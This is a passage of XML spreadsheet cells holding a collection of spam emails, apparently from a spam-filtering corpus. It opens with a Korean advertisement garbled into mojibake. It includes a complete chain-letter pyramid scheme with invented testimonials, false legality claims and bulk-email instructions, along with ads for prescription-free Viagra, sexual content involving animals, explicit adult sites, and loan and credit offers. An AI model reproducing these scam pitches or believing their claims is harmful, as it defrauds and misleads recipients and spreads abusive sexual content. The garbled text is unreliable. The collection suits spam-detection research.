ë•Œ ì‚¬ì‹¤ ìžê²©ì¦ ìœ ë¬´ë³´ë‹¤ëŠ” ì‹¤ë¬´ê²½í—˜ê³¼ ì ê·¹ì„±ì„ ë” ì„ í˜¸í•˜ëŠ” ê²½í–¥ì´ ìžˆë‹¤. í•˜ì§€ë§Œ ì§ì¢…ì„ ë°”ê¾¸ì–´ë³´ë ¤ í•œë‹¤ê±°ë‚˜ ë³´ë‹¤
ë†’ì€ ì‹¤ë¬´ì§€ì‹ì„ ì›í•œë‹¤ë©´ ì´ë²ˆ ì—¬ë¦„ì— í•™ì›ì—ì„œì˜ ì‹¤ë¬´ì§€ì‹ ìŠµë“ì€ ì–´ë–¨ê¹Œ?  ì¶”ì²œITí•™ì› ë³´ê¸°
 ë°©ì†¡ : ë°©ì†¡ë¶„ì•¼ ì¤‘ì—ì„œë„ ì•„ë‚˜ìš´ì„œ, ì„±ìš°,
ìž‘ê°€, PD ë“±ì€ ì˜ˆì „ë¶€í„° ê¾¸ì¤€í•œ ì¸ê¸°ëª°ì´ë¥¼ í•˜ê³  ìžˆëŠ” ì§ì—…ì´ë‹¤. í•˜ì§€ë§Œ ìš”ì¦˜ ìƒˆë¡­ê²Œ ê°ê´‘ë°›ê³  ìžˆëŠ” ì§ì—…ì´ ë°”ë¡œ
'ì‡¼í•‘í˜¸ìŠ¤íŠ¸'. ì‡¼í•‘í˜¸ìŠ¤íŠ¸ì— ê´€í•´ì„œëŠ” ì„œì ì—ì„œë„ ê´€ë ¨ì„œì ì´ ë§Žì´ ë‚˜ì˜¬ì •ë„ë¡œ ì—¬ëŒ€ìƒë“¤ ì‚¬ì´ì—ì„  ì¸ê¸°ê°€ ë†’ì€
ì§ì—…ì´ë‹¤. ìˆœê°„ ìž¬ì¹˜ë ¥ê³¼ í‘œí˜„ë ¥ì´ ìžˆë‹¤ë©´ ì´ìª½ìœ¼ë¡œì˜ ë„ì „ì€ í•œë²ˆì¯¤ ìƒê°í•´ë´ë„ ì¢‹ì„ë²•.  ì‡¼í•‘í˜¸ìŠ¤íŠ¸ëž€?
ì‡¼í•‘í˜¸ìŠ¤íŠ¸ì™€ í•¨ê»˜ 'ìœ í†µ
ë¶„ì•¼ì—ì„œì˜ ê½ƒ'ì´ë¼ ë¶ˆë¦¬ìš°ëŠ” MD(Merchandiser).  ìœ í†µì˜ ê½ƒ
MDì˜ ì „ë¬¸ì„±
 ë·°í‹° : ç¾Ž ë˜ëŠ” ê±´ê°•ì— ëŒ€í•œ ê´€ì‹¬ì´ ë†’ì•„ì§€ë©´ì„œ
ë·°í‹° ê´€ë ¨ ì‚°ì—…ì´ í™œí™©ì„ ë§žê³  ìžˆë‹¤. ì´ì— í”¼ë¶€ê´€ë¦¬ì‚¬, ë°œê´€ë¦¬ì‚¬, ìŠ¤í¬ì¸ ë§ˆì‚¬ì§€ë¥¼ ë¹„ë¡¯í•˜ì—¬ ë„¤ì¼ì•„í‹°ìŠ¤íŠ¸,
ë©”ì´í¬ì—…ì•„í‹°ìŠ¤íŠ¸, í—¤ì–´ë””ìžì´ë„ˆ, ì»¬ëŸ¬ë””ë ‰í„°ë¥¼ ì–‘ì„±í•˜ëŠ” í•™ì›ë“¤ë„ ë§Žì´ ìƒê²¨ë‚˜ê³  ìžˆëŠ” ì¶”ì„¸. ç¾Žì— ëŒ€í•œ ê´€ì‹¬ì€
ì—¬ì„±ë¿ë§Œ ì•„ë‹ˆë¼ ë‚¨ì„±ì—ê²Œë„ ì¤‘ìš”ì‹œ ë˜ê³  ìžˆëŠ” ë¶„ì•¼ì´ë©°, ìš”ì¦ˆìŒì€ 'ê½ƒë¯¸ë‚¨'ì´ë¼ ë¶ˆë¦¬ìš°ëŠ” í”¼ë¶€ê°€ ê³±ê³  ì˜ˆì˜ìž¥í•œ
ë‚¨ìžë“¤ì´ ì¸ê¸°ê°€ ë†’ë‹¤. ë”°ë¼ì„œ í”¼ë¶€ê´€ë¦¬ì‚¬ ìžê²©ì¦ì„ ì†Œì§€í•˜ê³  ìžˆìœ¼ë©´ í”¼ë¶€ê³¼, ì „ë¬¸í”¼ë¶€ë§ˆì‚¬ì§€ì„¼í„° ë“± ì¸ë ¥ìˆ˜ê¸‰ì´ ì¢‹ì€
ìƒíƒœ.  ì¶”ì²œë·°í‹°í•™ì›
ë³´ê¸°
 ì¸í…Œë¦¬ì–´ : ìž‘ë…„ë¶€í„° ê±´ì¶•ë¦¬ë‰´ì–¼ ë° ìž¬ê±´ì¶• ë°”ëžŒì´
ë¶ˆë©´ì„œ ì¸í…Œë¦¬ì–´ ì‚°ì—…ì´ ê°ê´‘ë°›ê³  ìžˆë‹¤. ë˜í•œ MBCì—ì„œ ì¸ê¸°ë¦¬ì— ë°©ì˜ë˜ê³  ìžˆëŠ” 'ëŸ¬ë¸Œí•˜ìš°ìŠ¤'ë¥¼ í†µí•´ì„œë„ ì´ë¯¸
ê±´ì¶•ë¦¬ë‰´ì–¼ì´ë‚˜ ì¸í…Œë¦¬ì–´ê°€ ì£¼ëª©ë°›ê³  ìžˆëŠ” ìƒíƒœ. ì¸í…Œë¦¬ì–´ ë“±ì˜ ë¶„ì•¼ì—ì„œ ì¼ í•˜ë ¤ë©´ ë°˜ë“œì‹œ ê´€ë ¨ ìžê²©ì¦ì´ í•„ìš”í•˜ë‹¤.
 ê±´ì¶•ê´€ë ¨
ìžê²©ì¦ë³´ê¸° 0 ë³¸ë©”ì¼ì€ ì •ë³´í†µì‹ ë§ ì´ìš©ì´‰ì§„ ë° ì •ë³´ë³´í˜¸ ë“±ì— ê´€í•œ ë²•ë¥  ì œ 50ì¡°ì— ì˜ê±°í•œ
[ê´‘ê³ ]ë©”ì¼ ìž…ë‹ˆë‹¤.0. ê·€í•˜ì˜ ë©”ì¼ì£¼ì†ŒëŠ”
ì›¹ì„œí•‘ì¤‘,@memo@ ì—ì„œ ì•Œê²Œ ëœê²ƒì´ë©°, E-Mail ì£¼ì†Œ ì™¸ì—, ë‹¤ë¥¸ ì •ë³´ëŠ” ê°–ê³  ìžˆì§€ ì•ŠìŠµë‹ˆë‹¤. ë¨¼ì € í—ˆë½ì—†ì´ ë©”ì¼ì„ ë°œì†¡í•´ì„œ ëŒ€ë‹¨ížˆ
ì£„ì†¡í•©ë‹ˆë‹¤Â 
[ìˆ˜ì‹  ê±°ë¶€]Â í´ë¦­í•˜ì‹œì–´ ë©”ì¼ì„
ë³´ë‚´ì£¼ì‹œë©´ ë‹¤ì‹œëŠ” ë©”ì¼ì„ ë³´ë‚´ì§€ ì•Šë„ë¡ ë…¸ë ¥í•˜ê² ìŠµë‹ˆë‹¤. Â ê°ì‚¬í•©ë‹ˆë‹¤.</t>
  </si>
  <si>
    <t xml:space="preserve">
Dear 
Friend,A recent survey by Nielsen/Netratings says that "The Internet 
population is rapidly approaching a 'Half a Billion' people!"SO WHAT 
DOES ALL THIS MEAN TO YOU? EASY MONEY!!Let's assume that every person 
has only one E-mail address...that's 500 million potential customers and 
growing!ï¿½ In addition,E'mail is without question the most powerful 
method of distributinginformation on the face of the earth.Well, I 
think you get the picture.ï¿½ The numbers and potential are just 
staggering, but it gets even better...Suppose I told you that you could 
start your own E-mail businesstoday and enjoy these 
benefits:ï¿½ï¿½ï¿½ï¿½ *** All Customers Pay You In 
Cash!!!ï¿½ï¿½ï¿½ï¿½ *** You Will Sell A Product Which Costs 
Nothing to Produce!ï¿½ï¿½ï¿½ï¿½ *** Your Only Overhead Is Your 
Time!ï¿½ï¿½ï¿½ï¿½ *** You Have 100s Of Millions Of Potential 
Customers!!!ï¿½ï¿½ï¿½ï¿½ *** You Get Detailed, Easy To Follow 
Startup 
Instructions!ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ AND 
THIS IS JUST THE TIP OF THE ICEBERG . . .As you read on you'll discover how 
a 'Seen on National TV' program is paying out a half million dollars, every 
4 to 5 monthsfrom your home, for an investment of only $25 US Dollars 
expense,one time.ï¿½ ALL THANKS TO THE COMPUTER AGE . . . AND THE 
INTERNET!Before you say "Bull", please read the following:This is 
the letter you have been hearing about on the newslately.ï¿½ Due to the 
popularity of this letter on the Internet,a national weekly news program 
recently devoted an entireshow to the investigation of this program 
described below,to see if it really can make people money.The show 
also investigated whether or not the program waslegal.ï¿½ Their findings 
proved once and for all that there are"absolutely NO laws prohibiting the 
participation in theprogram and if people can follow the simple 
instructions,they are bound to make some mega bucks with only $25 out 
ofpocket cost".ï¿½ï¿½ï¿½ï¿½ DUE TO THE RECENT INCREASE 
OF POPULARITYï¿½ï¿½ï¿½ï¿½ AND RESPECT THIS PROGRAM HAS 
ATTAINED,ï¿½ï¿½ï¿½ï¿½ IT IS CURRENTLY WORKING BETTER THAN 
EVER!***** This is what one had to say:"Thanks to this 
profitable opportunity.ï¿½ I was approached manytimes before but each 
time I passed on it.ï¿½ I am so glad Ifinally joined just to see what one 
could expect in returnfor the minimal effort and money required.ï¿½ To my 
asonishment,I received total $610,470.00 in 21 weeks, with money 
stillcoming 
in".ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ Pam 
Hedland,ï¿½ Fort Lee, New 
Jersey----------------------------------------------------------------Here 
is another testimonial:"This program has been around for a long time but 
I neverbelieved in it.ï¿½ But one day when I received this again in 
the mail I decided to gamble my $25 on it.ï¿½ I followed thesimple 
instructions and walaa. . . .ï¿½ 3 weeks later the moneystarted to come 
in.ï¿½ First month I only made $240.00 but thenext 2 months after that I 
made a total of $290,000.00.So far, in the past 8 months by re-entering the 
program, I have made over $710,000.00 and I am playing it again.The 
key to success in this program is to follow the simplesteps and NOT change 
anything."More testimonials later but first:** PRINT THIS NOW 
FOR YOUR FUTURE REFERENCEIf you would like to make at least $500,000 
every 4 to 5 months easily and comfortably, please read the following . . 
.THEN READ IT AGAIN and AGAIN!!!**FOLLOW THESE SIMPLE 
INSTRUCTIONS,ï¿½ï¿½ï¿½ TO MAKE YOUR FINANCIAL DREAMS 
ï¿½ï¿½ï¿½ COME 
TRUE**INSTRUCTIONS:-------------------***** Order all 5 reports 
shown on the list below.***** For each report, send $5 US CASH, THE NAME 
&amp; NUMBER OF THE REPORT YOU ARE ORDERING andYOUR E-MAIL ADDRESS to 
the person whose name appearsON THAT LIST next to the 
report.ï¿½ï¿½ï¿½ï¿½ MAKE SURE YOUR RETURN ADDRESS IS ON 
YOURï¿½ï¿½ï¿½ï¿½ ENVELOPE TOP LEFT CORNER in case of any 
mailï¿½ï¿½ï¿½ï¿½ problems.ï¿½ï¿½ï¿½ï¿½ 
*****When you place your order, make 
sureï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ 
you order each of the 5 reports *****You will need all 5 reports so that 
you can save them on yourcomputer and resell them.YOUR TOTAL COST $5 
X 5 = $25.00**********Within a few days you will receive, via e-mail, 
eachof the 5 reports from these 5 different individuals.ï¿½ Savethem 
on your computer so they will be accessible for you tosend to the 1,000's of 
people who will order them from you.Also make a floppy of these reports and 
keep it at your deskin case something happens to your 
computer.**********IMPORTANT - DO NOT alter the names of the 
peoplewho are listed next to each report, or their sequence on the list, 
in any way other than what is intructed below in steps1 through 6 or you 
will lose out on the majority of your profits.Once you understand the way 
this works, you will also see howit does not work if you change 
it.Remember, this method has been tested, and if you alter,it will 
NOT work!!!People have tried to put their friends/relatives names 
onall five thinking they could get all the money.ï¿½ But it doesnot 
work this way.ï¿½ Believe us, we have tried to be greedyand then nothing 
happened.So do not try to change anything other than what is 
instructed.Because if you do, it will not work for you.ï¿½ 
Remember,honesty reaps the reward!!!1. After you have ordered all 5 
reports, take this advertisement and REMOVE the name and address of the 
person inREPORT # 5.ï¿½ This person has made it through the cycle and is 
no doubt counting their fortune.2. Move the name &amp; address in 
REPORT #4 down to REPORT #5.3. Move the name &amp; address in REPORT #3 down 
to REPORT #4.4. Move the name &amp; address in REPORT #2 down to REPORT 
#3.5. Move the name &amp; address in REPORT #1 down to REPORT #2.6. 
Insert YOUR name &amp; address in the REPORT #1 Position.PLEASE MAKE 
SURE you copy every name &amp; 
addressACCURATELY!-----------------------------------------------------------------------------Take 
this entire letter, with the modified list of names,and save it on your 
computer.ï¿½ DO NOT MAKE ANY OTHERCHANGES.ï¿½ Save this on a disk as 
well just in case you looseany data.To assist you with marketing 
your business on the Internet,the 5 reports you purchase will provide you 
with invaluablemarketing information that includes:ï¿½ How to send bulk 
e-mailslegally, Where to find thousand of free classified ads and much, 
much more.There are 2 Primary methods to get this venture 
going:ï¿½ï¿½ METHOD #1:ï¿½ SENDING BULK E-MAIL 
LEGALLYï¿½ï¿½ 
---------------------------------------------------------Let's say that you 
decide to start small, just to see howit goes, and we'll assume you and 
those involved send outonly 5,000 emails each.ï¿½ Let's also assume that 
the mailingreceives only a 0.2% response (the response could be 
muchbetter but lets just say it is only 0.2%.ï¿½ Also, many 
peoplewill send out hundreds of thousands of e-mails instead ofonly 
5,000 each).Continuing with this example, you send out only 5,000 
e-mails.With a 0.2% response, that is only 10 orders for Report #1.Those 
10 people resonded by sending out 5,000 e-mails eachfor a total of 
50,000.ï¿½ Out of those 50,000 e-mails only 0.2%responded with 
orders.ï¿½ That's 100 people responded andordered Report #2.ï¿½ Those 
100 people mail out 5,000 e-mailseach for a total of 500,000 e-mails.ï¿½ 
The 0.2% response to that is 1000 orders for Report #3.Thoe 1000 
people send out 5,000 e-mails each for a total of5 million e-mails sent 
out.ï¿½ The 0.2% response to that is10,000 orders for Report #4.ï¿½ 
Those 10,000 people send out5,000 e-mails each for a total of 50,000,000 (50 
million)e-mails.ï¿½ the 0.2% response to that is 100,000 orders 
forReport #5.THAT'S 100,000 ORDERS TIMES $5 EACH = 500,000(a 
half a million).ï¿½ï¿½ï¿½ï¿½ Your total income in this 
example is:ï¿½ï¿½ï¿½ï¿½ 1......$50 +ï¿½ï¿½ï¿½ï¿½ 
2......$500 +ï¿½ï¿½ï¿½ï¿½ 3......$5,000 
+ï¿½ï¿½ï¿½ï¿½ 4......$50,000 +ï¿½ï¿½ï¿½ï¿½ 
5......$500,000 .................. Grand Total = 
$555,550.00ï¿½ï¿½ï¿½ï¿½ NUMBERS DO NOT LIE.ï¿½ GET A 
PENCIL &amp; PAPER ANDï¿½ï¿½ï¿½ï¿½ FIGURE OUT THE WORST POSSIBLE 
RESPONSES AND ï¿½ï¿½ï¿½ï¿½ NO MATTER HOW YOU CALCULATE IT, YOU 
WILLï¿½ï¿½ï¿½ï¿½ STILL MAKE A LOT OF 
MONEY!----------------------------------------------------------------------ï¿½ï¿½ï¿½ï¿½ 
REMEMBER FRIEND, THIS IS ASSUMING ONLY 10ï¿½ï¿½ï¿½ï¿½ PEOPLE 
ORDERING OUT OF 5,000 PEOPLE YOU MAILED.Dare to think for a moment what 
would happen if everyone,or 1/2, or even 1/5 of those people mailed 100,000 
e-mailseach or more?ï¿½ There are over 250 million people on the 
Internet worldwide and counting.ï¿½ Believe me, many peoplewill do 
just that, and more!ï¿½ï¿½ï¿½ï¿½ METHOD #2:ï¿½ PLACING 
FREE ADS ON THE INTERNETï¿½ï¿½ï¿½ 
---------------------------------------------------------------------Advertising 
on the net is very, very inexpensive and thereare hundreds of FREE places to 
advertise.ï¿½ Placing a lot offree ads on the internet will easily get a 
larger response.We strongly suggest you start with method # 1 and add 
METHOD# 2 as you go along.For every $5 you receive, all you must do 
is e-mail them the Report they ordered.ï¿½ That's it!ï¿½ Always 
provide same dayservice on all orders.ï¿½ This will guarantee that the 
e-mailsthey send out, with your name and address on it, will beprompt 
because they can not advertise until they receive 
thereport.ï¿½ï¿½ï¿½ï¿½ ORDER EACH REPORT BY IT NUMBER 
&amp; NAME ONLY.Note:ï¿½ Always send $5 cash (US Currency) for each 
report.Checks are NOT accepted.ï¿½ Make sure the cash is wrapped inat 
lease 2 sheets of paper before you put it in the envelope.On one of those 
sheets of paper, write the NUMBER and the NAMEof the Report you are 
ordering, your email ADDRESS, your NAMEand postal address.ï¿½ Make sure 
you affix the proper 'International'Postage if ordering a report from 
outside your country.ï¿½ï¿½ï¿½ï¿½ PLACE YOUR ORDER FOR THESE 
REPORTS 
NOW:-------------------------------------------------------------------------Report 
#1:ï¿½ The Insider's Guide to Advertising for Free on the NetOrder Report 
#1 from:K.J. NickelsP.O. Box 739Waukesha, WI 
53187______________________________________________________Report 
#2:ï¿½ The Insider's Guide to Sending Bulk e-mail on the NetOrder Report 
#2 from:K. Heritage6933 W. University Ave #610Gainsville, FL 
32607_______________________________________________________Report 
#3:ï¿½ Secret to Multilevel marketing on the Net:Order Report #3 
from:T. Turner5317 Bonner Dr.Corpus Christie, TX 
78411______________________________________________________Report 
#4:ï¿½ How to become a Millionaire utilizing MLM &amp; the NetOrder 
Report #4 from:Mel Hahn111 Wilmont Drive Unit GWaukesha, WI 
53189______________________________________________________Report 
#5:ï¿½ How to send out One Million e-mailsOrder Report #5 from:J. 
Frid13324 Radisson Rd. N.E.Ham Lake, MN 
55304______________________________________________________There are 
currently almost 500,000,000 people online worldwide!$$$$$$$$$$ YOUR 
SUCCESS GUIDLINES$$$$$$$$$$Follow these guidlines to guarantee your 
success:************************************If you do not receive at 
least 10 orders for Report #1 within2 weeks, continue sending e-mails until 
you do.After you have received 10 orders, 2 to 3 weeks after thatyou 
should receive 100 orders or more for Report #2.ï¿½ If youdid not, 
continue advertising or sending e-mails until you do.Once you have 
received 100 or more orders for Report #2, YOUCAN RELAX, because the system 
is already working for you,and the cash will continue to roll 
in!!THIS IS IMPORTANT TO REMEMBER: Every time your nameis moved down 
the list, you are placed in front of a different report.You can KEEP 
TRACK of your PROGRESS by watching whichreport people are ordering form 
you.IF YOU WANT TO GENERATE MORE INCOME SEND ANOTHERBATCH OF E-MAILS 
AND START THE WHOLE PROCESSAGAIN.ï¿½ There is NO LIMIT to the income you 
can generatefrom this 
business!!!________________________________________________________ï¿½ï¿½ï¿½ï¿½ 
FOLLOWING IS A NOTE FROM THE ORIGINATORï¿½ï¿½ï¿½ï¿½ OF THIS 
PROGRAM:You have just received information that can give you 
financialfreedom for the rest of your life, with NO RISK and JUST 
ALITTLE BIT OF EFFORT.ï¿½ You can make more money in the nextfew 
weeks and months than you have ever imagined.Follow the program EXACTLY 
AS INSTRUCTED.ï¿½ Do not changeit in any way.ï¿½ It works exceedings 
well as it is now.Remember to e-mail a copy of this exciting report after 
youhave put your name and address in Report #1 and moved othersto 
#2..........#5 as instructed above.ï¿½ One of the peopleyou send this to 
may send out 100,000 or more emails and yourname will be on every one of 
them.ï¿½ Remember though, the moreyou send out the more potential 
customers you will reach.So my friend, I have given you the ideas, 
information,materials and opportunity to become financially 
independent.IT IS UP TO YOU NOW!**********MORE 
TESTIMONIALS**********"My name is Mitchell.ï¿½ My wife Jody and I 
live in Chicago.I am an accountant with a major US Corporation and I 
makepretty good money.ï¿½ When I received this program I grumbledto 
Jody about receiving "junk mail".ï¿½ I made fun of thewhole thing, 
spouting my knowledge of the population andpercentages involved.ï¿½ I 
"knew" it wouldn't work.ï¿½ Jodytotally ignored my supposed intelligence 
and a few days latershe jumped in with both feet.ï¿½ I made merciless fun 
of her,and was ready to lay the old "I told you so" on her whenthe thing 
didn't work.ï¿½ Well, the laugh was on me!ï¿½ Within3 weeks she had 
received 50 responses.ï¿½ Within the next 45days she had received a total 
of $147,200.00 all cash!I was shocked.ï¿½ I have joined Jody in her 
"hobby".ï¿½ï¿½ï¿½ï¿½ Mitchell Wof,ï¿½ Chicago, 
Illinois----------------------------------------------------------------"Not 
being the gambling type, it took me several weeks tomake up my mind to 
participate in this plan.ï¿½ But conservativethat I am, I decided that 
the initial investment was so littlethat there was just no way that I 
wouldn't get enough ordersto at least get my money back.ï¿½ I was 
surprised when I foundmy medium sized post office box crammed with 
orders.ï¿½ I made$319,210.00 in the first 12 weeks.ï¿½ The nice thing 
about thisdeal is that it does not matter where people live.ï¿½ 
Theresimply isn't a better investment with a faster return andso 
big".ï¿½ï¿½ï¿½ï¿½ Dan Sondstrom,ï¿½ Alberta, 
Canada---------------------------------------------------------------"I 
had received this program before.ï¿½ I deleted it, but laterI wondered if 
I should hav given it a try.ï¿½ Of course, Ihad no idea who to contact to 
get another copy, so I had towait until I was e-mailed again by someone else 
. . . . . . . 11 months passed then it luckily came again.ï¿½ I did not 
delete this one!ï¿½ I made more than $490,000 on my first tryand all 
the money came within 22 weeks".ï¿½ï¿½ï¿½ï¿½ Susan De 
Suza,ï¿½ï¿½ New York, 
NY--------------------------------------------------------------"It 
really is a great opportunity to make relatively easymoney with little cost 
to you.ï¿½ I followed the simpleinstructions carefully and within 10 days 
the money startedto come in.ï¿½ My first month I made $20,560.00 and by 
theend of the third month my total cash count was $362,840.00.Life is 
beautiful, thanks to the Internet".ï¿½ï¿½ï¿½ï¿½ Fred 
Dellaca,ï¿½ Westport, New 
Zealand---------------------------------------------------------------ORDER 
YOUR REPORTS TODAY AND GET STARTEDON YOUR ROAD TO FINANCIAL 
FREEDOM!---------------------------------------------------------------If 
you have any questions of the legality of this program,contact the Office of 
Associate Director of MarketingPractices, Federal Trade Commission, Bureau 
of ConsumerProtection, Washington, D.C.ï¿½ We are not the authors of this 
program and do not warrant any guarantees as to how much earnings you 
willachieve.ï¿½ This is a one time mailing.ï¿½ If you wish to be 
removed from our list please reply to this e-mail with "remove" in the 
subject lineand you will be removed immediately.ï¿½ </t>
  </si>
  <si>
    <t xml:space="preserve">
New Page 1
VIAGRA
WITHOUT
A DOCTORS VISIT!!
CLICK
HERE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Â 
Â 
Â 
Â 
Â 
Â 
Â 
Â 
TO GET DELETED 
http://194.44.46.21/remove.php
Â 
Â 
3606uLdz7-798Gxne6717WLiQ1-104VoKJ8349uvAE9-31l43</t>
  </si>
  <si>
    <t>Dear Sir or Madam:Please reply to 
Receiver: China Enterprise Management Co., Ltd. (CMC)
E-mail: unido@chinatop.netAs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time:1. Consulting Service on Mandatory National Standards of The People's Republic of China.2. Consulting Service on Inspection and Quarantine Standards of The People's Republic of China.3. Consulting Service for Permission to Enter Chinese MarketWe are very sorry to disturb you! More information, please check our World Wide Web: http://www.chinatop.netSincerely yours-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Dear Sir or Madam:Please reply to 
Receiver: China Enterprise Management Co., Ltd. (CMC)
E-mail: unido@chinatop.netAs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time:1. Consulting Service on Mandatory National Standards of The People's Republic of China.2. Consulting Service on Inspection and Quarantine Standards of The People's Republic of China.3. Consulting Service for Permission to Enter Chinese MarketWe are very sorry to disturb you! More information, please check our World Wide Web: http://www.chinatop.netSincerely yours</t>
  </si>
  <si>
    <t>!!!Freak Cock!!!
Click Here 
    to be Removed</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</si>
  <si>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7749doNL1-136DfsE5701lGxl2-486pAKM7127JwoR4-054PCfq9499xMtW0-594hucS91l66</t>
  </si>
  <si>
    <t xml:space="preserve">Do you like Sexy Animals doing the wild thing? We have the super hot content on the Internet!
This is the site you have heard about. Rated the number one adult site three years in a row!
- Thousands of pics from hardcore fucking, and cum shots to pet on girl.- Thousands videosSo what are you waiting for?CLICK HERE
YOU MUST BE AT LEAST 18 TO ENTER!
Â 
Â 
Â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[NKIYs5]
</t>
  </si>
  <si>
    <t xml:space="preserve">Norton AD
Â 
      ATTENTION:
            This is a MUST for ALL Computer Users!!!
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diagnostics!Â 
6
Feature-Packed Utilities
1
 Great
            Price             A $300+  Combined Retail Value
            YOURS for Only $29.99!
&lt;Includes
            FREE Shipping!&gt;
 Don't fall prey to destructive viruses
    or hackers!ProtectÂ  your computer and your valuable  information
    and-&gt;
            CLICK HERE to Order Yours NOW! &lt;-Click
      here for more information
Â Â Â Â Â Â Â 
      Your
      email address was obtained from an opt-in list. Opt-in MRSA List
      Â Purchase Code # 312-1-010.Â Â If you wish to be unsubscribed
      from this list, please
CLICK HERE
</t>
  </si>
  <si>
    <t>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
  </si>
  <si>
    <t>DON'T MISS OUT ON AN AMAZING BUSINESS OPPORTUNITY AND WEIGHT LOSS PRODUCT! 
PLEASE VISIT www.good4u.autodreamteam.com
THERE IS NO OBLIGATION 
AND IT'S WORTH A LOOK!</t>
  </si>
  <si>
    <t>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cvstceuyxxkxgnxskjnc</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</si>
  <si>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graham_adlam</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</si>
  <si>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4592gPjt0-916msGW0934HwlS5-965Tqzv4189Rjvx0-174yaja0756SEjNl56</t>
  </si>
  <si>
    <t>Here It Is!!!! zzzz ,Mortgage companies make you wait...They Demand to Interview you...
They Intimidate you...They Humiliate you...
And All of That is While They Decide If They Even Want to 
Do Business With You...We Turn the Tables on Them...
Now, You're In ChargeJust Fill Out Our Simple Form and They Will Have to Compete For Your Business...CLICK HERE FOR FORMWe have hundreds of loan programs, including:
Purchase Loans
Refinance
Debt Consolidation
Home Improvement 
Second Mortgages
No Income VerificationCLICK HERE FOR FORM
If you no longer wish to receive any of our mailings you may be 
permanently removed by Clicking Here.
If there has been any inconvenience we apologize. [BJK9^":}H&amp;*TG0BK5NKIYs5]</t>
  </si>
  <si>
    <t xml:space="preserve">SEE US FOR FREE! Hi there,Me and my slutty amateur girlfriends just put up our very 1st website.
We made our website to get us modeling jobs and movie deals, so it is FREE (for now). 
Itï¿½s an adult site with nudity and stuff, so no one under 18 please. It is 100% FREE!
GO HERE , check us out, and help us get discovered.XOXO Jenni
Â 
Â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[7BJK9^":}H&amp;*TG0BK5NKIYs5]
</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t xml:space="preserve">
EM049You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</si>
  <si>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Note: 
This is NOT SPAM!! This is NOT Unsolicited Email!! You are receiving this message because you OPTED-IN to receive certain special offers from one of our partnering sites.
Have you changed your mind?Do you want to STOP receiving these special offers? If so, go down to the bottom and click on the "unsubscribe" link to be removed from this OPT-IN only list.
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::Dear Subscriber, Please take a moment to remove yourself from this list if you feel you are receiving these messages in error, by going down to the bottom and clicking on the Â“unsubscribeÂ” link below.
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Special Offer $2.99 until 08/26/2202 5:00 pm
1. Sexual Fitness and Penis Enlargement System
............................................................
Video of the week:(Choking a Chinese Chicken?)Caught on tape!
Some Asian Guy in a Chinese Dressing Room. What the hell is this guy doing in there? Is he actually chocking his chicken on tape? You'll see about him and more when you check out this special offer!Offer #08-515352-2002(4)
Page (1 of 1)Special Offer $2.99 until 08/26/2202 5:00 pm
............................................................
Subject : Male Enlargement/Strengthening and Total Sexual Fitness!
For only............($2.99)!Just wanted to remind you about the special we have this month. Our total program has the following information:Â·        How to Increase Permanent Length!  
Â·        How to Increase Permanent Width!
Â·        How to stop pre-mature ejaculation!  
Â·        How to stop Erectile Dysfunction!
Â·        How to Increase Penis Strength!  
Â·        How to make your Penis Thick and Meaty!
Â·        How to Enlarge the Penis head (glans)!  
Â·        How to Increase Staying Power!
Â·        How to Increase Ejaculation Distance and Volume!  
Â·        Plus much more!!!! Plus our new Quick Start Program:*Quick Start - Extreme Sexual Fitness Program!Now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inside!*The Most information about Penis Enlargement and Sexual Fitness!With over (40) Different Techniques each explained step-by-step, this system is the best value for your money pound for pound!*The Lowest price on the Net! .....($2.99) for everything!!
This offer is for a limited time only! Order Today!
Special Offer $2.99 until 08/26/2202 5:00 pm
For other Info:
FAQ's
Testimonials
Ordering Info
Business Opps
Video of the week info
Advertising Info
Plus all other!Go to: www.bigthangz.com::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
 2. Boost your Sales!
............................................................
Your Ad Will be here if you want it seen by Millions every month! Plus be in Widely circulated Magazines and Newspapers Nationwide! Plus join our Permission based email Advertising ring! Blow your sales through the roof!
Ask us how at: sales@bigthangz.comNumbers 3-10...............Coming Soon!Have you changed your mind?Do you want to STOP receiving these special offers? If so, go down to the bottom and click on the "unsubscribe" link to be removed from this OPT-IN only list.---
To remove yourself from further mailings, click the link below:
http://GetResponse.com/r.cgi?a=specialweboffers&amp;e=zzzz_Xyspamassassin.taint.org&amp;i=</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</si>
  <si>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m_d_serv</t>
  </si>
  <si>
    <t>kenya
Do you have too much debt?Would you like to lower your monthly payments 
and save money?Let us help you click hereIf you would like to be taken off our list, click here
2170uzHA6-646nlhK0895SDnb0-294BCPgl32</t>
  </si>
  <si>
    <t>Market Internet Access No Investment Needed Premium Internet Access for only $14.95 per month or less! Earn $1 per Subscriber per monthGo To:http://new.isp.50megs.com/
1918BQhX5-227CpaM0598cJWr2-912YmJg32l34</t>
  </si>
  <si>
    <t xml:space="preserve">Ã¿FFFFA9 
      Copyright 2002 - All rights reservedIf you would no longer like us 
      to contact you or feel that you havereceived this email in error, 
      please click here to 
      unsubscribe.
Â 
</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</si>
  <si>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http://www.smokesdirect.com/?ID=2Best regards
Sales Department
Smokes Direct
Spain
xay2158961y</t>
  </si>
  <si>
    <t>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Anybodyï¿½s Deal By 15%
We make it easy and affordable to start accepting Credit Cards today.
99% of our applicants are approved!THIS IS NOT AN OFFER TO OBTAIN A CREDIT CARD!
US RESIDENTS ONLY!http://servicesma.com/leads.htm
To Unsubscribe, Please Click 
http://www.servicesma.com/remove.html</t>
  </si>
  <si>
    <t>Market Internet Access No Investment Needed Premium Internet Access for only $14.95 per month or less! Earn $1 per Subscriber per monthGo To:http://new.isp.50megs.com/
3442BvLB9-565fAFx0200Lbck9-698onqh7l33</t>
  </si>
  <si>
    <t xml:space="preserve">
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(I3-ss1)9302YsCL8-129qkjk2635Okca5-604qkYb2284cVMm7-023uoOI4889tl53</t>
  </si>
  <si>
    <t xml:space="preserve">
8 FREE Movie TicketsYou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</si>
  <si>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Does Your Computer Need an Oil Change
Does Your Computer Need an Oil
      Change?
